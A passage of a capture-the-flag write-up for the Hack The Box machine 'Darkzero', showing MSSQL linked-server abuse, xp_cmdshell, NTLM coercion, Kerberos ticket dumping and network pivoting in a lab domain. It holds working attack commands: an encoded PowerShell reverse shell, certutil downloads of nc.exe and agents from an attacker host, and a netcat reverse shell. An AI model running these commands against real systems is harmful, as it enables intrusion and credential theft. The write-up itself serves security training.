> ## Documentation Index
> Fetch the complete documentation index at: https://hackwithmike.com/llms.txt
> Use this file to discover all available pages before exploring further.

# Darkzero (Hard) - HTB

> Windows | Released on 4th October, 2025 | Created by 0xEr3bus

## Starting the box

***

<img src="https://mintcdn.com/hackwithmike/eWEru_D0Pf4cKcse/assets/images/htb/darkzero/pwned.png?fit=max&auto=format&n=eWEru_D0Pf4cKcse&q=85&s=85361782bcd8fb1e1a221c8f3d9fa852" noZoom width="878" height="851" data-path="assets/images/htb/darkzero/pwned.png" />

Link to the box: [https://app.hackthebox.com/machines/darkzero](https://app.hackthebox.com/machines/darkzero)

### Port Scan

We start off the box by running a port scan on the provided IP.

```sh title="Attacker Linux" icon="linux" theme={null}
rustscan -a 10.129.215.80 -r 1-65535 -- -A -vvv -oN DarkZero
```

Output of Rustscan:

```text title="Terminal Output" icon="file-lines" expandable theme={null}
Open 10.129.215.80:53
Open 10.129.215.80:88
Open 10.129.215.80:135
Open 10.129.215.80:139
Open 10.129.215.80:389
Open 10.129.215.80:445
Open 10.129.215.80:464
Open 10.129.215.80:593
Open 10.129.215.80:636
Open 10.129.215.80:1433
Open 10.129.215.80:2179
Open 10.129.215.80:3268
Open 10.129.215.80:3269
Open 10.129.215.80:5985
Open 10.129.215.80:9389
Open 10.129.215.80:49664
Open 10.129.215.80:49666
Open 10.129.215.80:49670
Open 10.129.215.80:49671
Open 10.129.215.80:49891
Open 10.129.215.80:49908
Open 10.129.215.80:49963
```

A few key notes:

* Port 88 is open, which means this is likely a Windows Domain Controller (DC).
* Port 1433 is open, which is the usual port for MSSQL
* Port 5985 is open, which is the usual port for WinRM.

### Edit the Hosts file

As always, we edit the `/etc/hosts` file to add the hostname:

```sh title="Attacker Linux" icon="linux" theme={null}
sudo nano /etc/hosts
```

/etc/hosts

```text title="Nano Interface" icon="file-lines" theme={null}
10.129.215.80 dc01.darkzero.htb darkzero.htb
```

## Initial User

***

<Note>As is common in real life pentests, you will start the DarkZero box with credentials for the following account john.w / RFulUtONCOL!</Note>

We can use NetExec to check if the credentials are valid for AD:

```sh title="Attacker Linux" icon="linux" theme={null}
nxc smb 10.129.215.80 -u john.w -p 'RFulUtONCOL!'
```

* NLTM authentication is allowed.
* Only default shares are present.

### Enumerating Active Directory Environment

#### Running Bloodhound

Let's fix our clock synchronization before doing any AD enumerations:

```sh title="Attacker Linux" icon="linux" theme={null}
sudo rdate -n dc01.darkzero.htb 
```

We can run Bloodhound now:

```sh title="Attacker Linux" icon="linux" theme={null}
bloodhound-ce-python -d darkzero.htb -u john.w -p 'RFulUtONCOL!' -ns 10.129.215.80 -c all
```

Key Notes of the Bloodhound results:

* No outbound control from `john.w`. No special groups too.
* Only 3 domain users - `john.w`, administrator, and krbtgt.

#### Checking ADCS Attacks

Let's check if there are any vulnerable ADCS templates:

```sh title="Attacker Linux" icon="linux" theme={null}
certipy-ad find  -u john.w -p 'RFulUtONCOL!' -dc-ip 10.129.215.80 -vulnerable -enabled
```

* No vulnerable template for our controlled user.

### Enumerating MSSQL

Since Port 1433 (MSSQL) is open, we can try our credentials on it to see if our user has access to the MSSQL server:

```sh title="Attacker Linux" icon="linux" theme={null}
impacket-mssqlclient john.w:'RFulUtONCOL!'@10.129.215.80 -windows-auth
```

We were able to successfully login to the MSSQL server as guest. We can start by enumerating the users. There is nothing of interest for now.

```text title="MSSQL Client" icon="file-lines" theme={null}
SQL (darkzero\john.w  guest@master)> enum_users
UserName             RoleName   LoginName DefDBName DefSchemaName  UserID  SID   
------------------   --------   --------  -------   -------------  ------  -----   
dbo                  db_owner   sa        master    dbo            b'1    '  b'01'

guest                public     NULL      NULL      guest          b'2    '  b'00'

INFORMATION_SCHEMA   public     NULL      NULL      NULL           b'3    '  NULL

sys                  public     NULL      NULL      NULL           b'4    '  NULL
```

#### Trying NTLM coercion with MSSQL

Let's do force authentication (coercion attacks) to our controlled server with `xp_dirtree` in MSSQL to see if the obtained hash is crackable.

We'll use impacket's `smbserver.py` to capture the hash:

```sh title="Attacker Linux" icon="linux" theme={null}
impacket-smbserver share smb -smb2support
```

Then, on our MSSQL shell, we use `xp_dirtree` to list the directory of our SMB server, forcing a NLTM authentication to our server:

```text title="MSSQL Client" icon="file-lines" theme={null}
xp_dirtree \\10.10.14.52\share 
```

On our SMB server, we have successfully captured the Domain Controller's machine hash, which is likely uncrackable.

```text title="SMBServer.py" icon="linux" theme={null}
[*] User DC01\DC01$ authenticated successfully
[*] DC01$::darkzero:aaaaaaaaaaaaaaaa:8bfbf59122ef57c4527bd6a65ce3971c:010100000000000000b218f31436dc01f18dae79b472a36f00000000010010006e00750059007400670066006f004d00030010006e00750059007400670066006f004d000200100079004e006b00700063004e00590079000400100079004e006b00700063004e00590079000700080000b218f31436dc0106000400020000000800300030000000000000000000000000300000e001c6bcbd8c83f129e1195f40dfae8dd4a5eb283d34cd4cbe7e243f916bf1bd0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00330036000000000000000000
```

We can try it with Hashcat anyway:

```powershell title="Attacker Windows" icon="windows" theme={null}
.\hashcat -m 5600 hash.txt rockyou.txt
```

* The rockyou.txt was exhausted. Let's move on to other attack vectors.

#### Enumerating Linked Servers

Let's check if there is any linked servers with our MSSQL instance.

```text title="MSSQL Client" icon="file-lines" theme={null}
SQL (darkzero\john.w  guest@master)> enum_links
SRV_NAME            SRV_PROVIDERNAME   SRV_PRODUCT   SRV_DATASOURCE      SRV_PROVIDERSTRING   SRV_LOCATION   SRV_CAT   
-----------------   ----------------   -----------   -----------------   ------------------   ------------   -------   
DC01                SQLNCLI            SQL Server    DC01                NULL                 NULL           NULL      

DC02.darkzero.ext   SQLNCLI            SQL Server    DC02.darkzero.ext   NULL                 NULL           NULL      

Linked Server       Local Login       Is Self Mapping   Remote Login   
-----------------   ---------------   ---------------   ------------   
DC02.darkzero.ext   darkzero\john.w                 0   dc01_sql_svc 
```

Pay attention to the second half of the output:

```text title="MSSQL Client" icon="file-lines" theme={null}
Linked Server       Local Login       Is Self Mapping   Remote Login   
-----------------   ---------------   ---------------   ------------   
DC02.darkzero.ext   darkzero\john.w                 0   dc01_sql_svc 
```

* This indicates that we will be authenticated as `dc01_sql_svc` when interacting with `DC02.darkzero.ext`.

Using this command ChatGPT provided, we are able to confirm that `dc01_sql_svc` is sysadmin on `DC02.darkzero.ext`:

```text title="MSSQL Client" icon="file-lines" theme={null}
SQL (darkzero\john.w  guest@master)> EXEC ('SELECT SUSER_SNAME() AS suser, ORIGINAL_LOGIN() AS original_login, IS_SRVROLEMEMBER(''sysadmin'') AS is_sysadmin') AT [DC02.darkzero.ext];
suser          original_login   is_sysadmin   
------------   --------------   -----------   
dc01_sql_svc   dc01_sql_svc               1  
```

#### Using Linked Server

##### Using the Linked Server on DC02:

From the `impacket-MSSQL` client menu, we can see that there is a `use_link` procedure.

```text title="MSSQL Client" icon="file-lines" theme={null}
SQL (darkzero\john.w  guest@master)> use_link "DC02.darkzero.ext"
SQL >"DC02.darkzero.ext" (dc01_sql_svc  dbo@master)> 
```

* We are in `DC02` now.

Let's check if we can enumerate any users. The results returned nothing of interest.

```text title="MSSQL Client" icon="file-lines" theme={null}
SQL >"dc02.darkzero.ext" (dc01_sql_svc  dbo@master)> enum_impersonate
execute as   database   permission_name   state_desc   grantee    grantor                        
----------   --------   ---------------   ----------   --------   ----------------------------   
b'USER'      msdb       IMPERSONATE       GRANT        dc_admin   MS_DataCollectorInternalUser   
```

##### Enabling XP\_CMDSHELL:

Since we are the sysadmin, we have to privilege to enable `xp_cmdshell`, which would allow us to execute system commands as the MSSQL server.

```text title="MSSQL Client" icon="file-lines" theme={null}
SQL >"DC02.darkzero.ext" (dc01_sql_svc  dbo@master)> enable_xp_cmdshell
INFO(DC02): Line 196: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
INFO(DC02): Line 196: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
```

Success! We can run system command on DC02 now. Let's run a quick `whoami` to check which user is running this MSSQL service. It looks like we have a service account.

```text title="MSSQL Client" icon="file-lines" theme={null}
SQL >"DC02.darkzero.ext" (dc01_sql_svc  dbo@master)> xp_cmdshell whoami
output                 
--------------------   
darkzero-ext\svc_sql  
```

##### Starting a reverse shell from MSSQL:

Let's try to run a base64-encoded PowerShell reverse shell payload. However, it was not working properly here and it returned a broken shell.

```text title="MSSQL Client" icon="file-lines" theme={null}
SQL >"DC02.darkzero.ext" (dc01_sql_svc  dbo@master)> xp_cmdshell "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMwA2ACIALAA0ADQAMwApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA="
```

We will simply download a Netcat binary and run a Netcat reverse shell. We successfully received a proper shell on our listener.

```text title="MSSQL Client" icon="file-lines" theme={null}
SQL >"DC02.darkzero.ext" (dc01_sql_svc  dbo@master)> xp_cmdshell "certutil -urlcache -f http://10.10.14.52/nc.exe C:\users\svc_sql\nc.exe"
SQL >"DC02.darkzero.ext" (dc01_sql_svc  dbo@master)> xp_cmdshell "C:\users\svc_sql\nc.exe 10.10.14.52 443 -e cmd"
```

### Enumerating DC02

We first run a quick WinPEAS to see if there is anything interesting. While there was no output that stood out, we can still try to crack the NetNTLMv2 hash of our controlled user regardless. We tried with Hashcat and it cannot be cracked. Let's move on.

```text title="WinPEAS Output" icon="windows" theme={null}
͹ Enumerating Security Packages Credentials
  Version: NetNTLMv2
  Hash:    svc_sql::darkzero-ext:1122334455667788:ed60e0b39ee874fb8a6c46864a522f0e:010100000000000097e71c751736dc01e0fbc9a6d90f1f30000000000800300030000000000000000000000000300000ac2eeddd7cb5a397fd5890e204f607bf981c22d5f96a7ffbde0d3d903e07bf380a00100000000000000000000000000000000000090000000000000000000000
```

The DNS cached output indicates that there is a 172.16.20.x internal network, and DC02 is running on 172.16.20.2.

```text title="WinPEAS Output" icon="windows" theme={null}
͹ DNS cached --limit 70--
dc01.darkzero.htb  dc01.darkzero.htb  172.16.20.1
dc01.darkzero.htb  dc01.darkzero.htb  10.129.215.80 
```

#### Running Ligolo to access the internal network

The easiest way to enumerate the internal network is to run Ligolo on our controlled machine. We will first start the proxy server on our attacker Linux:

```text title="Attacker Linux" icon="linux" theme={null}
─$ sudo ./proxy -selfcert -laddr 0.0.0.0:8888
[sudo] password for kali: 
WARN[0000] Using default selfcert domain 'ligolo', beware of CTI, SOC and IoC! 
WARN[0000] Using self-signed certificates               
WARN[0000] TLS Certificate fingerprint for ligolo is: 10AA9FB421D64E6F402973B407C6AAA8F74068836BD5A55B6F8B42FA6EBE0174 
INFO[0000] Listening on 0.0.0.0:8888                     
    __    _             __                       
   / /   (_)___ _____  / /___        ____  ____ _
  / /   / / __ `/ __ \/ / __ \______/ __ \/ __ `/
 / /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ / 
/_____/_/\__, /\____/_/\____/     /_/ /_/\__, /  
        /____/                          /____/   

  Made in France ♥            by @Nicocha30!
  Version: 0.7.1-alpha
```

Then, we will download the Ligolo agent to the victim machine, and run the agent to connect back to our proxy server.

```powershell title="Victim Windows (DC02)" icon="windows" theme={null}
wget 10.10.14.52/ligolo/agent.exe -o agent.exe
Start-Process ".\agent.exe" -ArgumentList "-connect 10.10.14.52:8888 -ignore-cert -retry" -WindowStyle Hidden
```

Use the `session` command in the Ligolo Interface to interact with our connected agent.

```text title="Ligolo Interface" icon="file-lines" theme={null}
session
```

To tunnel our traffic through the victim machine like a VPN, we first have to build a network interface for Ligolo:

```text title="Ligolo Interface" icon="file-lines" theme={null}
interface_create --name "ligolo"                       
```

We can run the `add_route` command to route our traffic to the corresponding subnet addresses. Here, for example, all traffics on our attacker Linux towards 172.16.20.0/16 will be routed to the victim machine via the `ligolo` interface, and act as we are on the same subnet as the victim machine.

```text title="Ligolo Interface" icon="file-lines" theme={null}
add_route --name ligolo --route 172.16.20.0/16
start
```

#### Running Bloodhound

This time, we will run Bloodhound with the Sharphound Ingestor on the victim Windows machine.

```powershell title="Victim Windows (DC02)" icon="windows" theme={null}
wget 10.10.14.52/SharpHound/SharpHound.exe -o s.exe
.\s.exe
```

On our attacker Linux machine, we will set up an SMB server to receive the output file.

```sh title="Attacker Linux" icon="linux" theme={null}
impacket-smbserver -smb2support share tools -username "test" -password "test"
```

On the victim Windows, we will upload the resulting Bloodhound ZIP file to our SMB server.

```powershell title="Victim Windows (DC02)" icon="windows" theme={null}
net use Z: \\10.10.14.52\share /user:test test
copy 20251005101452_BloodHound.zip \\10.10.14.52\share 
```

#### Running ADCS Enumeration Tools

We will also download the `Certify` binary on the target Windows.

```powershell title="Victim Windows (DC02)" icon="windows" theme={null}
wget 10.10.14.52/Certify/Certify.exe -o Certify.exe
```

##### Enumerate Certificate Authorities:

We will check if the CA on DC02 is vulnerable to ADCS attacks. The output looks normal.

```text title="Victim Windows (DC02)" icon="windows" theme={null}
.\Certify.exe enum-cas
...
[*] Enterprise/enrollment certificate authorities:

    Enterprise CA Name            : darkzero-ext-DC02-CA
    DNS Hostname                  : DC02.darkzero.ext
    FullName                      : DC02.darkzero.ext\darkzero-ext-DC02-CA
    Flags                         : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
    Cert SubjectName              : CN=darkzero-ext-DC02-CA, DC=darkzero, DC=ext
    Cert Thumbprint               : 56B26E2CB5DD40283F32A80A07D637782F557F95
    Cert Serial                   : 1643389103EC9DA6407DCE3E015ECD07
    Cert Start Date               : 7/29/2025 7:17:46 AM
    Cert End Date                 : 7/29/2035 7:27:43 AM
    Cert Chain                    : CN=darkzero-ext-DC02-CA,DC=darkzero,DC=ext
    User Specifies SAN            : Disabled
    RPC Request Encryption        : Enabled
    CA Permissions
      Owner: BUILTIN\Administrators             S-1-5-32-544

      Access Rights                                     Principal
      Allow  Enroll                                     NT AUTHORITY\Authenticated Users   S-1-5-11
      Allow  ManageCA, ManageCertificates               BUILTIN\Administrators             S-1-5-32-544
      Allow  ManageCA, ManageCertificates               darkzero-ext\Domain Admins         S-1-5-21-1969715525-31638512-2552845157-512
      Allow  ManageCA, ManageCertificates               darkzero-ext\Enterprise Admins     S-1-5-21-1969715525-31638512-2552845157-519
    Enrollment Agent Restrictions : None

    Enabled Certificate Templates:
        DirectoryEmailReplication
        DomainControllerAuthentication
        KerberosAuthentication
        EFSRecovery
        EFS
        DomainController
        WebServer
        Machine
        User
        SubCA
        Administrator
```

##### Enumerate Vulnerable ADCS Templates:

We will also check if there're any vulnerable ADCS templates on DC02 is vulnerable. Again, no vulnerable templates were returned.

```powershell title="Victim Windows (DC02)" icon="windows" theme={null}
.\Certify.exe enum-templates --filter-vulnerable
```

#### Checking the `Policy_Backup.inf` file:

We can see that there is a Policy\_Backup.inf file in the root directory, which is uncommon.

```text title="Victim Windows (DC02)" icon="windows" theme={null}
PS C:\> dir

    Directory: C:\

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----          5/8/2021   1:15 AM                PerfLogs
d-r---         7/29/2025   7:49 AM                Program Files
d-----         7/29/2025   7:48 AM                Program Files (x86)
d-r---         7/29/2025   8:23 AM                Users
d-----         7/30/2025   3:57 PM                Windows
-a----         7/30/2025   6:38 AM          18594 Policy_Backup.inf 
```

The `Policy_Backup.inf` file contains the privileges on different accounts:

```text title="Policy_Backup.inf Snippet" icon="windows" theme={null}
...
SeServiceLogonRight = *S-1-5-20,svc_sql,SQLServer2005SQLBrowserUser$DC02...
...
```

From the policy backup file, our controlled account `svc_sql` should have `SeServiceLogonRight` . But running `whoami /priv` does not return the right.

Our user is also in the `S-1-5-6` is the `NT AUTHORITY\SERVICE` group, but again we are missing the privilege.

```text title="Policy_Backup.inf Snippet" icon="windows" theme={null}
...
SeImpersonatePrivilege = *S-1-5-19,*S-1-5-20,*S-1-5-32-544,*S-1-5-6           
SeCreateGlobalPrivilege = *S-1-5-19,*S-1-5-20,*S-1-5-32-544,*S-1-5-6 
...
```

Checking with `whoami /all`, we can see that our user is in the `NT AUTHORITY\SERVICE` group.

```text title="Victim Windows (DC02)" icon="windows" theme={null}
Group Name                                 Type             SID                                        
========================================== ================ 
Everyone                                   Well-known group S-1-1-0
BUILTIN\Users                              Alias            S-1-5-32-545
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554
BUILTIN\Certificate Service DCOM Access    Alias            S-1-5-32-574
NT AUTHORITY\SERVICE                       Well-known group S-1-5-6
CONSOLE LOGON                              Well-known group S-1-2-1
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11
NT AUTHORITY\This Organization             Well-known group S-1-5-15
NT SERVICE\MSSQLSERVER                     Well-known group S-1-5-80-3880718306-3832830129-1677859214-2598158968-1052248003
LOCAL                                      Well-known group S-1-2-0
Authentication authority asserted identity Well-known group S-1-18-
```

Again, since `NT AUTHORITY\SERVICE` has the SID `S-1-5-6`, in theory our user should have the `SeImpersonatePrivilege`. However we are missing the privileges. It is likely because our current logon token type has been restricted.

A quick Google on restoring privilege sets for service account returned the following GitHub repo:

* [itm4n/FullPowers: Recover the default privilege set of a LOCAL/NETWORK SERVICE account](https://github.com/itm4n/FullPowers)

This however didn't work, likely because this was an old way to restore privilege and has likely been patched.

```text title="Victim Windows (DC02)" icon="windows" theme={null}
wget 10.10.14.52/FullPowers.exe -o FullPowers.exe
.\FullPowers.exe
```

### Retrieving NTLM hash of `svc_sql`

#### Dumping Cached Kerberos Ticket

After some research, we learn we have restricted privilege as our current token type is in the interactive logon type (2). To restore the service account's full privilege, we need to login with a service logon type (5) token.

* This can be done with a password login using RunasCs.exe to specify the logon type.
* However, we don't have password now.

By running `klist`, we note that we have a cached Kerberos ticket. This is good news since it means that we can likely dump out the ticket for Kerberos authentication.

```text title="Victim Windows (DC02)" icon="windows" theme={null}
C:\Windows\system32>klist 
klist

Current LogonId is 0:0x61e61

Cached Tickets: (1)

#0>     Client: svc_sql @ DARKZERO.EXT
		Server: krbtgt/DARKZERO.EXT @ DARKZERO.EXT
		KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
		Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
		Start Time: 11/15/2025 19:24:19 (local)
		End Time:   11/16/2025 5:24:19 (local)
        Renew Time: 11/22/2025 19:24:19 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called: DC02 
```

#### Changing User Password with NTLM Hash

It is possible to change a user password without knowing the current password. We can do it in two ways:

1. Using `mimikatz`'s `lsadump::changentlm` or `lsadump::setntlm`module on the Victim Windows machine, as long as we know the NTLM hash of the user, and the server accepts NTLM authentication.
2. Using `impacket`'s `changepasswd.py` tool on the remote Attacker Linux. Works for both Kerberos & NTLM authentication.

<br />

We can run `Certify.exe` on Windows to extract the valid Kerberos ticket, then either:

1. Run `Rubeus.exe` on Windows to extract the NTLM hash of the user.
2. Use the valid ticket to run remote tools like `impacket-changepasswd` to directly change the password. In our current scenario, we would also have to run pivoting tools like `Ligolo`, since the DC is in the unreachable internal network.

<br />

<Accordion title="Dead-end attempt - Troubleshooting ticket.kirbi from Rubeus (feel free to read along what I did)">
  Let's first get Rubeus on the machine.

  ```text title="Victim Windows (DC02)" icon="windows" theme={null}
  wget 10.10.14.52/Rubeus.exe -o Rubeus.exe
  ```

  We will dump out the Kerberos ticket in the `.kirbi` format.

  ```text title="Victim Windows (DC02)" icon="windows" expandable theme={null}
  PS C:\Users\svc_sql> .\Rubeus.exe dump /nowrap /outfile:ticket.kirbi
  ...
  Action: Dump Kerberos Ticket Data (Current User)

  [*] Current LUID    : 0x61e61

    UserName                 : svc_sql
    Domain                   : darkzero-ext
    LogonId                  : 0x61e61
    UserSID                  : S-1-5-21-1969715525-31638512-2552845157-1103
    AuthenticationPackage    : Kerberos
    LogonType                : Service
    LogonTime                : 11/15/2025 7:24:19 PM
    LogonServer              : DC02
    LogonServerDNSDomain     : DARKZERO.EXT
    UserPrincipalName        : svc_sql@darkzero.ext

      ServiceName              :  krbtgt/DARKZERO.EXT
      ServiceRealm             :  DARKZERO.EXT
      UserName                 :  svc_sql
      UserRealm                :  DARKZERO.EXT
      StartTime                :  11/15/2025 7:24:19 PM
      EndTime                  :  11/16/2025 5:24:19 AM
      RenewTill                :  11/22/2025 7:24:19 PM
      Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
      KeyType                  :  aes256_cts_hmac_sha1
      Base64(key)              :  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
      Base64EncodedTicket   :

        doIFgDCCBXygAwIBBaEDAgEWooIEhjCCBIJhggR+MIIEeqADAgEFoQ4bDERBUktaRVJPLkVYVKIhMB+gAwIBAqEYMBYbBmtyYnRndBsMREFSS1pFUk8uRVhUo4IEPjCCBDqgAwIBEqEDAgECooIELASCBChZFrxZdDAAVKKHU8ULes28QgpT5Zqtj1L8Pk+4/ktOLV4XRHFypjkQupdLOUv9QkbyLSbVP5nizY2tXlCvX8jC1s/pjLzOxVrnLUnh3Li63D0vJ1qpZFx2qVCV5GDDCaEArTq02sneh08diI4wjtvtH4fP+d68cE2i6py5B7xG6o5IjaYtbCk7PYjcTixt84a/HknSwe6uBWdUR4MpCsd4uyggIB5y4STXJc4YnStxvTv6+PIpnxZgKybgOcnnAkGF1MglAgxOHBOCWRkcKcLmrNxhiZKNo4KTIE7ALhWxgBQTgFuC7Ag0wpRiyzHC26V8H9vdY21RvWNT//6HdmxkelzFPm5GDMY4VV1SyRgxwLe9lQUqfitfiIAM0PkO0TzePIEKQvkD7gCShz1YytLik8QxezpNpdtOWS9cN+78Yh9/dYnGCPswQ8AOoPyIUbYzaRn4MvgBfTgis0by+MbsqdlKkEftrwibtN/uxWSv8Y0Th405kCN4MH/v1QZT7jo8lBIH1V1oZtNwPIQC7nrMV3OeEteFgz1fXDNEpXMn9z4bWTgOE+5F6pPbwwXvJdPGXQFXvKZZUKEpDGHs+OW15G1YEpa36cDR5O4pTKtcfUfhN2vpsWmj4/54IqrFKn+e0w5E1z3QJnyh/HEDV4PWT6+tQpem76BIoCVH6mHO9o5xCGZ3XJ5ZeWc7oR/woehHbT1t+UW3h7BR/85FtIo9kTcS1Mw5PTETHvMt9rp6EQO5K6ieVbc2M9nUjb+OGa2956ScBG0yOZSdjPKChE53EdXzecUWZArdQdKI4Jb4i1/+HhOoNrjhCUF5CRgAnVj2tvEEn62LV6yEeIZI5WtNYFZLOe+YNP6hsIf7Ta8YHiRgeYJIChFbE5khPzRRRw9tw/EoxDpIaRMQHVmOkVazBxw0eXChhkkMZFbqeZTxM7nsAunVYrfGILnpRDYTViBl842zLVZMUAGvSosWqSe25Zv+EWeoeIs2RZ37oOgVb4EjB3YrNySiCvYrAf7eoRcmWO+wn+MKiOEXW0QAICfYNsoqRw3T41gKe3mlhTbN0FDfzORysrc6FB7hcBVvetdTEm8KeXG3QOTQSJZeYaokdtd9Z0TqYPSx2HvHVLED/wQUSvLo9sqdFXoh2ewAfFXJYXCaegFumb7BUe+1dB3BbxcBuzmwp49WnYT+seqy7lleGzbxXmO1DjYdPyJVnCj8PzwNUgnW9gFtxzkeaJD0UR8n0Iu4c8dSVDs6J7N6hR5JhROrlcxqhWrsajvuNzH1DxMsZucnPlHI1OXtguMa66+2URF0Wc8ou288PfuK5Mcwd/LCi86x98gAmE51NzVApoAolwB0bga+b9F7aiu/Y8FSUKhzl1CtopHh5jne6JBAzLMzS+AA2JlvbXGEJ/mpm3cqxXXKQKOB5TCB4qADAgEAooHaBIHXfYHUMIHRoIHOMIHLMIHIoCswKaADAgESoSIEIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAoQ4bDERBUktaRVJPLkVYVKIUMBKgAwIBAaELMAkbB3N2Y19zcWyjBwMFAEDhAAClERgPMjAyNTExMTYwMzI0MTlaphEYDzIwMjUxMTE2MTMyNDE5WqcRGA8yMDI1MTEyMzAzMjQxOVqoDhsMREFSS1pFUk8uRVhUqSEwH6ADAgECoRgwFhsGa3JidGd0GwxEQVJLWkVSTy5FWFQ=
  ```

  The KRB-CRED files (`.kirbi`) are output as base64 blobs and can be reused with the ptt function, or Mimikatz's `kerberos::ptt` functionality.

  * Here, since the ticket's LoginType is Service (Type 5), the tickets are non-exportable by default in Service Logon token. Therefore, even though we used the `/outfile` flag, no file was generated.

  We got this error when we are trying to save the ticket manually, or using the base64 blob in the command line:

  ```text title="Victim Windows (DC02)" icon="windows" theme={null}
  [-] Maximum prompt length is 335 characters. Current prompt is 1923
  ```

  Since our reverse shell cannot take the long base64 string, we'll create the ticket file on Linux, and upload the ticket file to the target system.

  ```sh title="Attacker Linux" icon="linux" theme={null}
  echo 'doIFgDCCBXygAwIBBaEDAgEWooIEhjCCBIJ....' > ticket.kirbi
  ```

  ```text title="Victim Windows (DC02)" icon="windows" theme={null}
  wget 10.10.14.52/ticket.kirbi -o ticket.kirbi
  ```

  However, when we try to run Rubeus with the ticket file, the following error was returned:

  ```text title="Victim Windows (DC02)" icon="windows" theme={null}
  [!] Unhandled Rubeus exception:                                                    Asn1.AsnException: value overflow
  	at Asn1.AsnElt.Decode(Byte[] buf, Int32 off, Int32 maxLen, Int32& tc, Int32& tv, Boolean& cons, Int32& valOff, Int32& valLen)
  	at Asn1.AsnElt.DecodeNoCopy(Byte[] buf, Int32 off, Int32 len)
  	at Asn1.AsnElt.DecodeNoCopy(Byte[] buf, Int32 off, Int32 len)
  	at Asn1.AsnElt.Decode(Byte[] buf, Int32 off, Int32 len, Boolean exactLength)
  	at Rubeus.KRB_CRED..ctor(Byte[] bytes)
  	at Rubeus.Commands.Changepw.Execute(Dictionary`2 arguments)
  	at Rubeus.Domain.CommandCollection.ExecuteCommand(String commandName, Dictionary`2 arguments)
  	at Rubeus.Program.MainExecute(String commandName, Dictionary`2 parsedArgs)
  ```

  * From LLM: This ASN.1 “value overflow” error typically means the ticket you’re feeding into `changepw` is not a valid `KRB_CRED` structure, even if it looks like a ticket.

  Oh, so the base64 blob is not a valid `.kirbi` file by itself. We have to decode it into the raw binary:

  ```sh title="Attacker Linux" icon="linux" theme={null}
  echo 'doIFgDCCBXygAwIBBaEDAgEWooI......' | base64 -d > ticket.kirbi
  ```

  The decoded binary ticket is working now.

  ```text title="Victim Windows (DC02)" icon="windows" theme={null}
  .\Rubeus.exe describe /ticket:ticket.kirbi
  ...
  [*] Action: Describe Ticket


    ServiceName              :  krbtgt/DARKZERO.EXT
    ServiceRealm             :  DARKZERO.EXT
    UserName                 :  svc_sql
    UserRealm                :  DARKZERO.EXT
    StartTime                :  11/15/2025 7:24:19 PM
    EndTime                  :  11/16/2025 5:24:19 AM
    RenewTill                :  11/22/2025 7:24:19 PM
    Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
    KeyType                  :  aes256_cts_hmac_sha1
    Base64(key)              :  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
  ```
</Accordion>

<br />

##### Running Certify.exe to request a valid login certificate:

Regardless, we can use Certify.exe to use the current cached ticket on Windows to request for a valid login certificate. We will run the `enum-cas` module to check the name of the CA, which is `darkzero.ext\darkzero-ext-DC02-CA`.

```text title="Victim Windows (DC02)" icon="windows" theme={null}
wget 10.10.14.52/Certify/Certify.exe -o Certify.exe
.\Certify.exe enum-cas
```

